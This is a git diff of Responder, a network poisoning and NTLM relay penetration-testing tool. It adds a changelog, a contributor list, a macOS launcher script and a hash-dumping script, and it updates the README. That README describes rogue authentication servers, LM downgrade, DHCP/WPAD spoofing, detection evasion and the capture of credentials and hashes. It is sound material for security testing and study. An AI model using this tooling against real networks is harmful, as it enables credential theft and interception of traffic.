traffic to. ([04c270f](https://github.com/lgandx/Responder/commit/04c270f6b75cd8eb833cca3b71965450d925e6ac) by lgandx). + +### Removed + +- removed debug info ([3e2e375](https://github.com/lgandx/Responder/commit/3e2e375987ce2ae03e6a88ffadabb13823ba859c) by lgandx). + +## [v2.3.2.1](https://github.com/lgandx/Responder/releases/tag/v2.3.2.1) - 2016-09-11 + +[Compare with v2.3.2](https://github.com/lgandx/Responder/compare/v2.3.2...v2.3.2.1) + +## [v2.3.2](https://github.com/lgandx/Responder/releases/tag/v2.3.2) - 2016-09-11 + +[Compare with v2.3.1](https://github.com/lgandx/Responder/compare/v2.3.1...v2.3.2) + +### Added + +- Added proxy auth server + various fixes and improvements ([82fe64d](https://github.com/lgandx/Responder/commit/82fe64dfd988321cbc1a8cb3d8f01caa38f4193e) by lgandx). +- Added current date for all HTTP headers, avoiding easy detection ([ecd62c3](https://github.com/lgandx/Responder/commit/ecd62c322f48eadb235312ebb1e57375600ef0f1) by lgandx). + +### Removed + +- Removed useless HTTP headers ([881dae5](https://github.com/lgandx/Responder/commit/881dae59cf3c95047d82b34208f57f94b3e85b04) by lgandx). + +## [v2.3.1](https://github.com/lgandx/Responder/releases/tag/v2.3.1) - 2016-09-09 + +[Compare with v2.3.0](https://github.com/lgandx/Responder/compare/v2.3.0...v2.3.1) + +### Added + +- Added SMBv2 support enabled by default. ([85d7974](https://github.com/lgandx/Responder/commit/85d7974513a9b6378ed4c0c07a7dd640c27ead9b) by lgandx). +- added new option, for Config-Responder.log file. ([a9c2b29](https://github.com/lgandx/Responder/commit/a9c2b297c6027030e3f83c7626fff6f66d5a4f1b) by lgaffie). +- Add compatability with newer net-tools ifconfig. ([e19e349](https://github.com/lgandx/Responder/commit/e19e34997e68a2f567d04d0c013b7870530b7bfd) by Hank Leininger). +- Add HTTP Referer logging ([16e6464](https://github.com/lgandx/Responder/commit/16e6464748d3497943a9d96848ead9058dc0f7e9) by Hubert Seiwert). +- Added recent Windows versions. ([6eca29d](https://github.com/lgandx/Responder/commit/6eca29d08cdd0d259760667da0c41e76d2cd2693) by Jim Shaver). +- Added: Support for OSx ([59e48e8](https://github.com/lgandx/Responder/commit/59e48e80dd6153f83899413c2fc71a46367d4abf) by lgandx). + +### Fixed + +- Fixed colors in log files ([d9258e2](https://github.com/lgandx/Responder/commit/d9258e2dd80ab1d62767377250c76bf5c9f2a50d) by lgaffie). +- Fixed the regexes for Authorization: headers. ([a81a9a3](https://github.com/lgandx/Responder/commit/a81a9a31e4dbef2890fbf51830b6a9374d6a8f8a) by Hank Leininger). +- Fix Windows 10 support. ([a84b351](https://github.com/lgandx/Responder/commit/a84b3513e1fdd47025ceaa743ce0f506f162640b) by ValdikSS). +- Fixed color bug in Analyze mode ([04c841d](https://github.com/lgandx/Responder/commit/04c841d34e0d32970f08ae91ad0f931b1b90d6ab) by lgandx). +- fixed minor bug ([6f8652c](https://github.com/lgandx/Responder/commit/6f8652c0fccfe83078254d7b38cb9fd517a6bf42) by lgandx). +- Fixed Icmp-Redirect.. ([df63c1f](https://github.com/lgandx/Responder/commit/df63c1fc138d1682a86bc2114a5352ae897865c6) by lgandx). +- Fixed some tools and +x on some executables ([8171a96](https://github.com/lgandx/Responder/commit/8171a96b9eaac3cd25ef18e8ec8b303c5877f4d0) by lgandx). +- Fix generation of HTTP response in HTTP proxy ([b2830e0](https://github.com/lgandx/Responder/commit/b2830e0a4f46f62db4d34b3e8f93ea505be32000) by Antonio Herraiz). +- Fix misspelling of poisoners ([6edc01d](https://github.com/lgandx/Responder/commit/6edc01d8511189489e4b5fd9873f25712920565c) by IMcPwn). + +### Changed + +- change IsOSX to utils.IsOsX. Fixes #89 ([08c3a90](https://github.com/lgandx/Responder/commit/08c3a90b400d0aff307dd43ff4cd6f01ca71a6cb) by Jared Haight). +- Changed email address ([f5a8bf0](https://github.com/lgandx/Responder/commit/f5a8bf0650bc088b6ef5ae7432f2baef0d52852c) by lgandx). +- Changed connection to SQlite db to support different encoded charsets ([0fec40c](https://github.com/lgandx/Responder/commit/0fec40c3b4c621ee21a88906e77c6ea7a56cb8a9) by Yannick Méheut). +- Changed comment to be more clear about what is being done when logging ([08535e5](https://github.com/lgandx/Responder/commit/08535e55391d762be4259a1fada330ef3f0ac134) by Yannick Méheut). + +### Removed + +- Removed the config dump in Responder-Session.log. New file gets created in logs, with host network config such as dns, routes, ifconfig and config dump ([a765a8f](https://github.com/lgandx/Responder/commit/a765a8f0949de37940364d0a228aff72c0701aa0) by lgaffie). + +## [v2.3.0](https://github.com/lgandx/Responder/releases/tag/v2.3.0) - 2015-09-11 + +[Compare with v2.1.4](https://github.com/lgandx/Responder/compare/v2.1.4...v2.3.0) + +### Added + +- Added support for Samba4 clients ([ee033e0](https://github.com/lgandx/Responder/commit/ee033e0c7f28a0584c8ebcb2c31fe949581f0022) by lgandx). +- Added support for upstream proxies for the rogue WPAD server ([f4bd612](https://github.com/lgandx/Responder/commit/f4bd612e083698fd94308fd2fd15ba7d8d289fd8) by jrmdev). + +### Fixed + +- Fixed Harsh Parser variable typo ([5ab431a](https://github.com/lgandx/Responder/commit/5ab431a4fe24a2ba4666b9c51ad59a0bb8a0053d) by lgandx). +- fixed var name ([62ed8f0](https://github.com/lgandx/Responder/commit/62ed8f00626a2ad0fbbfb845e808d77938f4513a) by byt3bl33d3r). +- Fixes MDNS Name parsing error ([3261288](https://github.com/lgandx/Responder/commit/3261288c82fee415dd8e1ba64b80596ef97da490) by byt3bl33d3r). +- Fixed FTP module. ([75664a4](https://github.com/lgandx/Responder/commit/75664a4f37feb897be52480223cd1633d322ede8) by jrmdev). +- Fixing a bug in HTTP proxy, was calling recv() too many times ([ddaa9f8](https://github.com/lgandx/Responder/commit/ddaa9f87674dc8ac3f9104196f2f92cdec130682) by lanjelot). + +### Changed + +- changed operand ([cb9c2c8](https://github.com/lgandx/Responder/commit/cb9c2c8b97761cc5e00051efd74c9c3fdaf5762d) by byt3bl33d3r). + +## [v2.1.4](https://github.com/lgandx/Responder/releases/tag/v2.1.4) - 2014-12-06 + +[Compare with v2.1.3](https://github.com/lgandx/Responder/compare/v2.1.3...v2.1.4) + +### Added + +- Added: FindSMB2UPTime script. Find when is the last time a >= 2008 server was updated. ([7a95ef1](https://github.com/lgandx/Responder/commit/7a95ef1474d3cea88680f359581aa89a4e9c30f5) by lgandx). + +## [v2.1.3](https://github.com/lgandx/Responder/releases/tag/v2.1.3) - 2014-11-27 + +[Compare with v2.1.2](https://github.com/lgandx/Responder/compare/v2.1.2...v2.1.3) + +### Added + +- Added: DontRespondToName and DontRespondTo; NAC/IPS detection evasion ([36ef78f](https://github.com/lgandx/Responder/commit/36ef78f85aea5db33f37a6d1d73bf3bb7f82336f) by lgandx). +- Added --version and kost's fix for /etc/resolv.conf empty lines parsing. ([c05bdfc](https://github.com/lgandx/Responder/commit/c05bdfce17234b216b408080d9aba5db443de507) by lgandx). + +## [v2.1.2](https://github.com/lgandx/Responder/releases/tag/v2.1.2) - 2014-08-26 + +[Compare with v2.1.0](https://github.com/lgandx/Responder/compare/v2.1.0...v2.1.2) + +### Added + +- Added: Log command line in Responder-Session.log. ([f69e93c](https://github.com/lgandx/Responder/commit/f69e93c02e81a83309d3863f6d5680b36378a16b) by lgandx). + +### Fixed + +- Fixed serve-always and serve-exe with the new WPAD server. ([cf7b477](https://github.com/lgandx/Responder/commit/cf7b4771caf335a1a283fae08923c413acae3343) by lgandx). + +## [v2.1.0](https://github.com/lgandx/Responder/releases/tag/v2.1.0) - 2014-08-16 + +[Compare with v2.0.9](https://github.com/lgandx/Responder/compare/v2.0.9...v2.1.0) + +### Fixed + +- fixed: identation. ([5c9fec9](https://github.com/lgandx/Responder/commit/5c9fec923c8cb77f00466db6192b1ecb8980bdcf) by lgandx). + +## [v2.0.9](https://github.com/lgandx/Responder/releases/tag/v2.0.9) - 2014-05-28 + +[Compare with v2.0.8](https://github.com/lgandx/Responder/compare/v2.0.8...v2.0.9) + +### Fixed + +- Fixed high cpu usage in some specific cases ([4558861](https://github.com/lgandx/Responder/commit/4558861ce2dd56c0e4c5157437c8726a26e382c5) by lgandx). + +### Removed + +- Removed: old style options. Just use -r instead of -r On ([a21aaf7](https://github.com/lgandx/Responder/commit/a21aaf7987e26eee5455d68cd76ff56b5466b7f2) by lgandx). + +## [v2.0.8](https://github.com/lgandx/Responder/releases/tag/v2.0.8) - 2014-04-22 + +[Compare with v2.0.7](https://github.com/lgandx/Responder/compare/v2.0.7...v2.0.8) + +### Added + +- Added: in-scope target, windows >= Vista support (-R) and unicast answers only. ([2e4ed61](https://github.com/lgandx/Responder/commit/2e4ed61bba2df61a1e1165b466a369639c425955) by lgandx). + +## [v2.0.7](https://github.com/lgandx/Responder/releases/tag/v2.0.7) - 2014-04-16 + +[Compare with v2.0.6](https://github.com/lgandx/Responder/compare/v2.0.6...v2.0.7) + +### Added + +- Added: in-scope llmnr/nbt-ns name option ([1c79bed](https://github.com/lgandx/Responder/commit/1c79bedac9083992ba019ff7134cdb3c718a6f15) by lgandx). +- Added: Kerberos server and -d cli option. ([dcede0f](https://github.com/lgandx/Responder/commit/dcede0fdf5e060e77fc51fbad2da3dbbff8edf8d) by lgandx). + +## [v2.0.6](https://github.com/lgandx/Responder/releases/tag/v2.0.6) - 2014-04-01 + +[Compare with v2.0.5](https://github.com/lgandx/Responder/compare/v2.0.5...v2.0.6) + +### Fixed + +- Fixed [Enter] key issue ([c97a13c](https://github.com/lgandx/Responder/commit/c97a13c1bdb79b4dcdf43f889fdd586c3c39b893) by lgandx). + +## [v2.0.5](https://github.com/lgandx/Responder/releases/tag/v2.0.5) - 2014-03-22 + +[Compare with v2.0.4](https://github.com/lgandx/Responder/compare/v2.0.4...v2.0.5) + +### Added + +- Added: In-scope IP handling for MDNS ([b14ff0b](https://github.com/lgandx/Responder/commit/b14ff0b36a100736f293ddbd8bbe1c538a370347) by lgandx). + +## [v2.0.4](https://github.com/lgandx/Responder/releases/tag/v2.0.4) - 2014-03-22 + +[Compare with v2.0.3](https://github.com/lgandx/Responder/compare/v2.0.3...v2.0.4) + +### Added + +- Added: MDNS Poisoner ([90479ad](https://github.com/lgandx/Responder/commit/90479adcca066602885ea2bfec32953ce71d6977) by lgandx). + +## [v2.0.3](https://github.com/lgandx/Responder/releases/tag/v2.0.3) - 2014-03-21 + +[Compare with v2.0.2](https://github.com/lgandx/Responder/compare/v2.0.2...v2.0.3) + +### Fixed + +- fix: Bind to interface bug. ([a1a4f46](https://github.com/lgandx/Responder/commit/a1a4f46c7ba8861ff71c1ea2045a72acf2c829bd) by lgandx). + +## [v2.0.2](https://github.com/lgandx/Responder/releases/tag/v2.0.2) - 2014-02-06 + +[Compare with v2.0.1](https://github.com/lgandx/Responder/compare/v2.0.1...v2.0.2) + +### Added + +- Added: Analyze mode; Lanman Domain/SQL/Workstation passive discovery. ([2c9273e](https://github.com/lgandx/Responder/commit/2c9273eb2ca8d5080ff81273f602547fe649c259) by lgandx). + +## [v2.0.1](https://github.com/lgandx/Responder/releases/tag/v2.0.1) - 2014-01-30 + +[Compare with first commit](https://github.com/lgandx/Responder/compare/e821133708098c74497a3f9b0387a3ad048d5a48...v2.0.1) + +### Added + +- Added: Analyze ICMP Redirect plausibility on current subnet. ([06df704](https://github.com/lgandx/Responder/commit/06df704960c556e3c2261a52827d55eb7b4ed0d4) by lgandx). +- Added: Analyze stealth mode. See all traffic, but dont answer (-A cli). Minor bugs also fixed. ([9bb2f81](https://github.com/lgandx/Responder/commit/9bb2f81044cd94f36f54c8daf7f1183bc761bb24) by lgandx). +- Added: -F command line switch to force authentication on PAC file retrieval. Default is Off ([3f48c11](https://github.com/lgandx/Responder/commit/3f48c114d5e713bfe68bef1717e18d3c266f358e) by lgandx). +- Added: IMAP module and enhanced wpad. ([af60de9](https://github.com/lgandx/Responder/commit/af60de95679f20eca4765b1450f80c48fbef689c) by lgandx). +- Added: SMTP PLAIN/LOGIN module ([6828f1b](https://github.com/lgandx/Responder/commit/6828f1b11ebfc0fc25a8fd00e8f373f3adfb7fc6) by lgandx). +- Added: POP3 module. ([f48ea3f](https://github.com/lgandx/Responder/commit/f48ea3f4b644c3eb25c63d402c6d30fcd29be529) by lgandx). +- Added: MSSQL Plaintext module ([4c3a494](https://github.com/lgandx/Responder/commit/4c3a494c86b7a95cf2c43a71bac182f231bf71cb) by lgandx). +- Added: SMBRelay module ([4dd9d8c](https://github.com/lgandx/Responder/commit/4dd9d8c1df3717ed928e73083c30e21aa5eaf8b4) by lgandx). +- added: Command switch -v for verbose mode. Responder is now less verbose. ([46b98a6](https://github.com/lgandx/Responder/commit/46b98a616d540ae618198784d0775e687371858e) by lgandx). +- Added support for .pac file requests. ([6b7e5b6](https://github.com/lgandx/Responder/commit/6b7e5b6441c7fdf19a163b8efb6fd588ccfee8ae) by lgandx). +- Added: print HTTP URL, POST data requested prior auth ([f616718](https://github.com/lgandx/Responder/commit/f6167183e046d2759ab6b885dd2f94bb2902c564) by lgandx). +- Added command switch -I. This option override Responder.conf Bind_to setting ([68de4ac](https://github.com/lgandx/Responder/commit/68de4ac26ec34bbf24524abb0c0b11ae34aa27a3) by lgandx). +- Added: in-scope only target. See Responder.conf. ([0465bd6](https://github.com/lgandx/Responder/commit/0465bd604d7cc22ef2c97f938d8564677030e5bd) by lgandx). +- Added: Fake access denied html page ([9b608aa](https://github.com/lgandx/Responder/commit/9b608aad30529e2bfea4d7c6e99343df0ba2d9d0) by lgandx). +- Added: Configuration file, removed several cli options and several fixes. ([95eed09](https://github.com/lgandx/Responder/commit/95eed099424568d4c67402f12a5de5d9d72c3041) by lgandx). +- Added: Configuration file for Responder ([d573102](https://github.com/lgandx/Responder/commit/d57310273df524b99d17c97b49ee35eb3aec7b52) by lgandx). +- Added: Bind shell listening on port 140, use it with -e or -exe option if needed ([1079de0](https://github.com/lgandx/Responder/commit/1079de052b7cc7c6caeb80e6ee081568ff359317) by Lgandx). +- Added: Ability to serve whatever kind of file via HTTP and WPAD There's now 3 new options. ([a8c2952](https://github.com/lgandx/Responder/commit/a8c29522db3555f7733a80d29271b3229e1149c6) by Lgandx). +- added -I option to bind all sockets to a specific ip (eg: listen only on eth0) ([d5088b2](https://github.com/lgandx/Responder/commit/d5088b24ee3d8bead640b37480be57fe564e70b5) by Lgandx). +- added: HTTP auth forward to SMB. This is useful for SMB Relay or LM downgrade from HTTP NTLM ESS to SMB LM. ([0fcaa68](https://github.com/lgandx/Responder/commit/0fcaa68c074e496edb2164ca35659ff636b5a361) by Lgandx). +- added automatic poisoning mode when a primary and a secondary DNS is specified. ([ccbbbe3](https://github.com/lgandx/Responder/commit/ccbbbe34535c12b664a39f5a99f98c1da79ca5a6) by Lgandx). +- Added HTTPS module. ([9250281](https://github.com/lgandx/Responder/commit/92502814aa3becdd064f0bfb160af826adb42f60) by Lgandx). +- Added support for LM hash downgrade. Default still NTLMSSP. ([09f8f72](https://github.com/lgandx/Responder/commit/09f8f7230d66cb35e1e6bed9fb2c9133ad5cc415) by Lgandx). +- Added: Client ip is now part of the cookie filename ([2718f9c](https://github.com/lgandx/Responder/commit/2718f9c51310e18e91d6d90c86657bdd72889f2a) by Lgandx). +- Added a folder for storing HTTP cookies files ([d1a14e2](https://github.com/lgandx/Responder/commit/d1a14e2f27d856ca1551232502835d6cddb3602d) by Lgandx). +- Added WPAD transparent proxy ([9f1c3bc](https://github.com/lgandx/Responder/commit/9f1c3bcba32c6feb008a39ece688522dcd9e757f) by Lgandx). + +### Fixed + +- Fixed WPAD cookie capture ([afe2b63](https://github.com/lgandx/Responder/commit/afe2b63c6a556a6da97e7ac89c96f89276d521c3) by lgandx). +- Fix: Command line switch typo ([4fb4233](https://github.com/lgandx/Responder/commit/4fb4233424273849085781225298de39b6c9c098) by lgandx). +- Fixed minor bugs ([f8a16e2](https://github.com/lgandx/Responder/commit/f8a16e28ee15a3af91542269e5b1ec9c69ea3d75) by Lgandx). +- Fixed duplicate entry in hash file for machine accounts ([4112b1c](https://github.com/lgandx/Responder/commit/4112b1cd5d06f021dcc145f32d29b53d4cb8d82a) by Lgandx). +- fix for anonymous NTLM connection for LDAP server ([1c47e7f](https://github.com/lgandx/Responder/commit/1c47e7fcb112d0efdb509e56a1b08d557eb9f375) by Lgandx). + +### Changed + +- Changed WPAD to Off by default. Use command line -w On to enable. ([bf2fdf0](https://github.com/lgandx/Responder/commit/bf2fdf083cdadf81747f87eb138a474911928b77) by lgandx). +- changed .txt to no extension. ([5f7bfa8](https://github.com/lgandx/Responder/commit/5f7bfa8cbe75d0c7fd24c8a83c44a5c3b02717a4) by lgandx). +- Changed Windows =< 5.2 documentation to XP/2003 and earlier for clarification ([56dd7b8](https://github.com/lgandx/Responder/commit/56dd7b828cf85b88073e88a8b4409f7dae791d49) by Garret Picchioni). + +### Removed + +- Removed bind to interface support for OsX. Responder for OsX can only listen on all interfaces. ([dbfdc27](https://github.com/lgandx/Responder/commit/dbfdc2783156cfeede5114735ae018a925b3fa78) by lgandx). + diff --git a/Contributors b/Contributors new file mode 100644 index 0000000..13dbafd --- /dev/null +++ b/Contributors @@ -0,0 +1,76 @@ +Commits | user +15 @jrmdev +7 @nobbd +6 @ValdikSS +6 @also-here +5 @HexPandaa +5 @exploide +5 @jvoisin +4 @Clément Notin +4 @Shutdown +4 @Yannick Méheut +3 @Hank Leininger +3 @brightio +3 @byt3bl33d3r +3 @myst404 +3 @skelsec +2 @Alexandre ZANNI +2 @Crypt0-M3lon +2 @Laban Sköllermark +2 @Matthew Daley +2 @Pixis +2 @Rob Fuller +2 @ThePirateWhoSmellsOfSunflowers +2 @Vincent Yiu +2 @requin +1 @Andrii Nechytailov +1 @Antonio Herraiz +1 @Chris Maddalena +1 @Euan +1 @Garret Picchioni +1 @Gifts +1 @Gustaf Blomqvist +1 @Hubert Seiwert +1 @IMcPwn +1 @Jared Haight +1 @Jim Shaver +1 @Khiem Doan +1 @Leon Jacobs +1 @Lionel PRAT +1 @Markus +1 @MatToufoutu +1 @Matt +1 @Matt Andreko +1 @Matt Kelly +1 @Nikos Vassakis +1 @OJ +1 @Paul A +1 @Randy Ramos +1 @SAERXCIT +1 @Sagar-Jangam +1 @Sans23 +1 @Sophie Brun +1 @Stephen Shkardoon +1 @Syntricks +1 @Timon Hackenjos +1 @Tom Aviv +1 @Ziga P +1 @cweedon +1 @deltronzero +1 @f3rn0s +1 @jackassplus +1 @jb +1 @kevintellier +1 @kitchung +1 @klemou +1 @lanjelot +1 @nickyb +1 @nodauf +1 @nop5L3D +1 @pixis +1 @ravenium +1 @soa +1 @steven +1 @thejosko +1 @trustedsec + diff --git a/DumpHash.py b/DumpHash.py index 016ca15..daf0382 100755 --- a/DumpHash.py +++ b/DumpHash.py @@ -1,4 +1,4 @@ -#!/usr/bin/env python +#!/usr/bin/env python3 # This file is part of Responder, a network take-over set of tools # created and maintained by Laurent Gaffie. # email: laurent.gaffie@gmail.com @@ -28,22 +28,28 @@ def GetResponderCompleteNTLMv2Hash(cursor): res = cursor.execute("SELECT fullhash FROM Responder WHERE type LIKE '%v2%' AND UPPER(user) in (SELECT DISTINCT UPPER(user) FROM Responder)") Output = "" for row in res.fetchall(): - Output += '{0}'.format(row[0])+'\n' + if "$" in row[0]: + pass + else: + Output += '{0}'.format(row[0])+'\n' return Output def GetResponderCompleteNTLMv1Hash(cursor): res = cursor.execute("SELECT fullhash FROM Responder WHERE type LIKE '%v1%' AND UPPER(user) in (SELECT DISTINCT UPPER(user) FROM Responder)") Output = "" for row in res.fetchall(): - Output += '{0}'.format(row[0])+'\n' + if "$" in row[0]: + pass + else: + Output += '{0}'.format(row[0])+'\n' return Output cursor = DbConnect() -print "Dumping NTLMV2 hashes:" +print("Dumping NTLMV2 hashes:") v2 = GetResponderCompleteNTLMv2Hash(cursor) DumpHashToFile("DumpNTLMv2.txt", v2) -print v2 -print "\nDumping NTLMv1 hashes:" +print(v2) +print("\nDumping NTLMv1 hashes:") v1 = GetResponderCompleteNTLMv1Hash(cursor) DumpHashToFile("DumpNTLMv1.txt", v1) -print v1 +print(v1) diff --git a/OSX_launcher.sh b/OSX_launcher.sh new file mode 100644 index 0000000..d9e9423 --- /dev/null +++ b/OSX_launcher.sh @@ -0,0 +1,39 @@ +# responder launcher +# set -x +# Usage: +# ./responderd /path/to/responder interface responder_options + +# port list +# Everything -> tcp:21 tcp:80 tcp:25 udp:53 tcp:88 udp:137 udp:138 tcp:139 tcp:143 tcp:443 tcp:445 tcp:110 tcp:389 tcp:1433 tcp:3141 udp:5353 udp:5355 +PORT_LIST=(tcp:21 udp:53 tcp:88 udp:137 udp:138 tcp:139 tcp:143 tcp:445 tcp:389 tcp:1433 udp:5353 udp:5355) +SVC_LIST=() + +# check for running processes and kill them one by one +# looping over everything rather than doing a mass kill because some processes may be +# children and may not need to be killed +for port in ${PORT_LIST[@]}; do + PROC=$(lsof +c 0 -i $port | grep -m 1 -v 'launchd\|COMMAND' | cut -d' ' -f1) + if [ -n "$PROC" ]; then + AGENT=$(sudo launchctl list | grep -m 1 $PROC | cut -f3 | sed 's/.reloaded//g') + + # load/unload are listed as "legacy" in 10.10+ may need to change this someday + echo "Stopping $PROC" + sudo launchctl unload -w /System/Library/LaunchDaemons/$AGENT.plist + + # append killed service to new array + SVC_LIST+=($AGENT) + fi +done + +# get IP address +IP=$(ifconfig $2 | grep 'inet ' | cut -d' ' -f2) + +# Launch responder +python $1 $3 -i $IP + +# restore stopped services +for agent in ${SVC_LIST[@]}; do + echo "Starting $agent" + sudo launchctl load -w /System/Library/LaunchDaemons/$agent.plist + +done diff --git a/README.md b/README.md old mode 100644 new mode 100755 index 09b547b..f09820f --- a/README.md +++ b/README.md @@ -1,6 +1,6 @@ -# Responder.py # +# Responder/MultiRelay # -LLMNR/NBT-NS/mDNS Poisoner +IPv6/IPv4 LLMNR/NBT-NS/mDNS Poisoner and NTLMv1/2 Relay. Author: Laurent Gaffie https://g-laurent.blogspot.com @@ -8,23 +8,23 @@ Author: Laurent Gaffie https://g-laurent.blogspot.c ## Intro ## -Responder an LLMNR, NBT-NS and MDNS poisoner. It will answer to *specific* NBT-NS (NetBIOS Name Service) queries based on their name suffix (see: http://support.microsoft.com/kb/163409). By default, the tool will only answer to File Server Service request, which is for SMB. - -The concept behind this is to target our answers, and be stealthier on the network. This also helps to ensure that we don't break legitimate NBT-NS behavior. You can set the -r option via command line if you want to answer to the Workstation Service request name suffix. +Responder is an LLMNR, NBT-NS and MDNS poisoner. ## Features ## +- Dual IPv6/IPv4 stack. + - Built-in SMB Auth server. -Supports NTLMv1, NTLMv2 hashes with Extended Security NTLMSSP by default. Successfully tested from Windows 95 to Server 2012 RC, Samba and Mac OSX Lion. Clear text password is supported for NT4, and LM hashing downgrade when the --lm option is set. SMBv2 has also been implemented and is supported by default. +Supports NTLMv1, NTLMv2 hashes with Extended Security NTLMSSP by default. Successfully tested from Windows 95 to Server 2022, Samba and Mac OSX Lion. Clear text password is supported for NT4, and LM hashing downgrade when the --lm option is set. If --disable-ess is set, extended session security will be disabled for NTLMv1 authentication. SMBv2 has also been implemented and is supported by default. - Built-in MSSQL Auth server. -In order to redirect SQL Authentication to this tool, you will need to set the option -r (NBT-NS queries for SQL Server lookup are using the Workstation Service name suffix) for systems older than windows Vista (LLMNR will be used for Vista and higher). This server supports NTLMv1, LMv2 hashes. This functionality was successfully tested on Windows SQL Server 2005 & 2008. +This server supports NTLMv1, LMv2 hashes. This functionality was successfully tested on Windows SQL Server 2005, 2008, 2012, 2019. - Built-in HTTP Auth server. -In order to redirect HTTP Authentication to this tool, you will need to set the option -r for Windows version older than Vista (NBT-NS queries for HTTP server lookup are sent using the Workstation Service name suffix). For Vista and higher, LLMNR will be used. This server supports NTLMv1, NTLMv2 hashes *and* Basic Authentication. This server was successfully tested on IE 6 to IE 10, Firefox, Chrome, Safari. +This server supports NTLMv1, NTLMv2 hashes *and* Basic Authentication. This server was successfully tested on IE 6 to IE 11, Edge, Firefox, Chrome, Safari. Note: This module also works for WebDav NTLM authentication issued from Windows WebDav clients (WebClient). You can now send your custom files to a victim. @@ -34,7 +34,11 @@ Same as above. The folder certs/ contains 2 default keys, including a dummy pri - Built-in LDAP Auth server. -In order to redirect LDAP Authentication to this tool, you will need to set the option -r for Windows version older than Vista (NBT-NS queries for HTTP server lookup are sent using the Workstation Service name suffix). For Vista and higher, LLMNR will be used. This server supports NTLMSSP hashes and Simple Authentication (clear text authentication). This server was successfully tested on Windows Support tool "ldp" and LdapAdmin. +This server supports NTLMSSP hashes and Simple Authentication (clear text authentication). This server was successfully tested on Windows Support tool "ldp" and LdapAdmin. + +- Built-in DCE-RPC Auth server. + +This server supports NTLMSSP hashes. This server was successfully tested on Windows XP to Server 2019. - Built-in FTP, POP3, IMAP, SMTP Auth servers. @@ -42,7 +46,7 @@ This modules will collect clear text credentials. - Built-in DNS server. -This server will answer type A queries. This is really handy when it's combined with ARP spoofing. +This server will answer type SRV and A queries. This is really handy when it's combined with ARP spoofing. - Built-in WPAD Proxy Server. @@ -52,10 +56,6 @@ This module will capture all HTTP requests from anyone launching Internet Explor This module allows to find the PDC in stealth mode. -- Fingerprinting - -When the option -f is used, Responder will fingerprint every host who issued an LLMNR/NBT-NS query. All capture modules still work while in fingerprint mode. - - Icmp Redirect python tools/Icmp-Redirect.py @@ -66,7 +66,7 @@ For MITM on Windows XP/2003 and earlier Domain members. This attack combined wit python tools/DHCP.py -DHCP Inform Spoofing. Allows you to let the real DHCP Server issue IP addresses, and then send a DHCP Inform answer to set your IP address as a primary DNS server, and your own WPAD URL. +DHCP Inform Spoofing. Allows you to let the real DHCP Server issue IP addresses, and then send a DHCP Inform answer to set your IP address as a primary DNS server, and your own WPAD URL. To inject a DNS server, domain, route on all Windows version and any linux box, use -R - Analyze mode. @@ -74,14 +74,14 @@ This module allows you to see NBT-NS, BROWSER, LLMNR, DNS requests on the networ ## Hashes ## -All hashes are printed to stdout and dumped in an unique file John Jumbo compliant, using this format: +All hashes are printed to stdout and dumped in a unique John Jumbo compliant file, using this format: (MODULE_NAME)-(HASH_TYPE)-(CLIENT_IP).txt Log files are located in the "logs/" folder. Hashes will be logged and printed only once per user per hash type, unless you are using the Verbose mode (-v). -- Responder will logs all its activity to Responder-Session.log -- Analyze mode will be logged to Analyze-Session.log +- Responder will log all its activity to Responder-Session.log +- Analyze mode will be logged to Analyzer-Session.log - Poisoning will be logged to Poisoners-Session.log Additionally, all captured hashed are logged into an SQLite database which you can configure in Responder.conf @@ -89,7 +89,7 @@ Additionally, all captured hashed are logged into an SQLite database which you c ## Considerations ## -- This tool listens on several ports: UDP 137, UDP 138, UDP 53, UDP/TCP 389,TCP 1433, TCP 80, TCP 139, TCP 445, TCP 21, TCP 3141,TCP 25, TCP 110, TCP 587, TCP 3128 and Multicast UDP 5553. +- This tool listens on several ports: UDP 137, UDP 138, UDP 53, UDP/TCP 389,TCP 1433, UDP 1434, TCP 80, TCP 135, TCP 139, TCP 445, TCP 21, TCP 3141,TCP 25, TCP 110, TCP 587, TCP 3128, Multicast UDP 5355 and 5353. - If you run Samba on your system, stop smbd and nmbd and all other services listening on these ports. @@ -121,56 +121,98 @@ Running the tool: Typical Usage Example: - ./Responder.py -I eth0 -rPv + ./Responder.py -I eth0 -Pv Options: - --version show program's version number and exit. - -h, --help show this help message and exit. - -A, --analyze Analyze mode. This option allows you to see NBT-NS, - BROWSER, LLMNR requests without responding. - -I eth0, --interface=eth0 - Network interface to use. - -i 10.0.0.21, --ip=10.0.0.21 - Local IP to use (only for OSX) - -e 10.0.0.22, --externalip=10.0.0.22 - Poison all requests with another IP address than - Responder's one. - -b, --basic Return a Basic HTTP authentication. Default: NTLM - -r, --wredir Enable answers for netbios wredir suffix queries. - Answering to wredir will likely break stuff on the - network. Default: Off - -d, --NBTNSdomain Enable answers for netbios domain suffix queries. - Answering to domain suffixes will likely break stuff - on the network. Default: Off - -f, --fingerprint This option allows you to fingerprint a host that - issued an NBT-NS or LLMNR query. - -w, --wpad Start the WPAD rogue proxy server. Default value is - Off - -u UPSTREAM_PROXY, --upstream-proxy=UPSTREAM_PROXY - Upstream HTTP proxy used by the rogue WPAD Proxy for - outgoing requests (format: host:port) - -F, --ForceWpadAuth Force NTLM/Basic authentication on wpad.dat file - retrieval. This may cause a login prompt. Default: - Off - -P, --ProxyAuth Force NTLM (transparently)/Basic (prompt) - authentication for the proxy. WPAD doesn't need to - be ON. This option is highly effective when combined - with -r. Default: Off - --lm Force LM hashing downgrade for Windows XP/2003 and - earlier. Default: Off - -v, --verbose Increase verbosity. - + --version show program's version number and exit + -h, --help show this help message and exit + -A, --analyze Analyze mode. This option allows you to see NBT-NS, + BROWSER, LLMNR requests without responding. + -I eth0, --interface=eth0 + Network interface to use, you can use 'ALL' as a + wildcard for all interfaces + -i 10.0.0.21, --ip=10.0.0.21 + Local IP to use (only for OSX) + -6 2002:c0a8:f7:1:3ba8:aceb:b1a9:81ed, --externalip6=2002:c0a8:f7:1:3ba8:aceb:b1a9:81ed + Poison all requests with another IPv6 address than + Responder's one. + -e 10.0.0.22, --externalip=10.0.0.22 + Poison all requests with another IP address than + Responder's one. + -b, --basic Return a Basic HTTP authentication. Default: NTLM + -d, --DHCP Enable answers for DHCP broadcast requests. This + option will inject a WPAD server in the DHCP response. + Default: False + -D, --DHCP-DNS This option will inject a DNS server in the DHCP + response, otherwise a WPAD server will be added. + Default: False + -w, --wpad Start the WPAD rogue proxy server. Default value is + False + -u UPSTREAM_PROXY, --upstream-proxy=UPSTREAM_PROXY + Upstream HTTP proxy used by the rogue WPAD Proxy for + outgoing requests (format: host:port) + -F, --ForceWpadAuth Force NTLM/Basic authentication on wpad.dat 